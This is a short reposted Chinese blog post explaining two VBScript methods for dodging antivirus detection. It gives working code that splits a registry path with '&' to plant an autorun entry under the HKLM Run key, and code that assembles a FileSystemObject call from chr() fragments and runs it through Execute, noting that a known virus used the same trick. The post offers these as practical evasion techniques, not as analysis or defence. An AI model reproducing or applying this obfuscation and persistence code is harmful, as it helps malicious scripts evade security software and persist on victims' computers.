檔躲避殺毒軟件的方法

穩萊

-------------------------------------------------------------------------------
轉自:http://blog.eviloctal.com/youker/

以下兩個方法在網絡上看到的,確實挺實用的,&號兩邊必須空格格開。


現在殺毒的對vbs相當敏感,只要發現對注冊表的xx作,或使用vbs運行命令(加用戶) 就可能被殺。下面談2方法可以簡單解決:

1.使用連接符"&" 如:
Set CURObj = CreateObject("WScript.Shell")
mhk="HK"&"LM\SOFT"&"WARE\Micr"&"osoft\Win"&"dows\Curren"&"tVersion\Run\"
CURObj.RegWrite ""&mhk&"internat.exe","internat.exe"

2.使用Execute函數(BY 動鯊 )

一些殺毒軟件,如瑞星,他門會監視網頁中的代碼,一旦你創建了FSO或寫注冊表,即使是正常的腳本他也會報告危險,但是當年新歡樂時光也用了FSO怎么就沒報警呢?原因是這個病毒使用Execute這個函數來躲過了防火墻,呵呵。病毒將這段聲明代碼轉化為字符串,然后通過Execute(String)函數執行,舉個例子
str="set fso=CreateObject( " & chr(34) & "scrip" & chr(116)& "ing.FileSystemObject"&chr(34)&""
msgbox str
Execute str

 給當前日誌評分:
Loading Vote
正在讀取評分資料...


文章來自: Tank部落格
引用通告: 查看所有引用 | 我要引用此文章
Tags: 殺毒軟件
相關日誌:

評論: 0 | 引用: 0 | 查看次數: -
發表評論
暱 稱:
密 碼: 遊客發言不需要密碼.
內 容:
驗證碼: 驗證碼
選 項:
雖然發表評論不用註冊,但是為了保護您的發言權,建議您註冊帳號.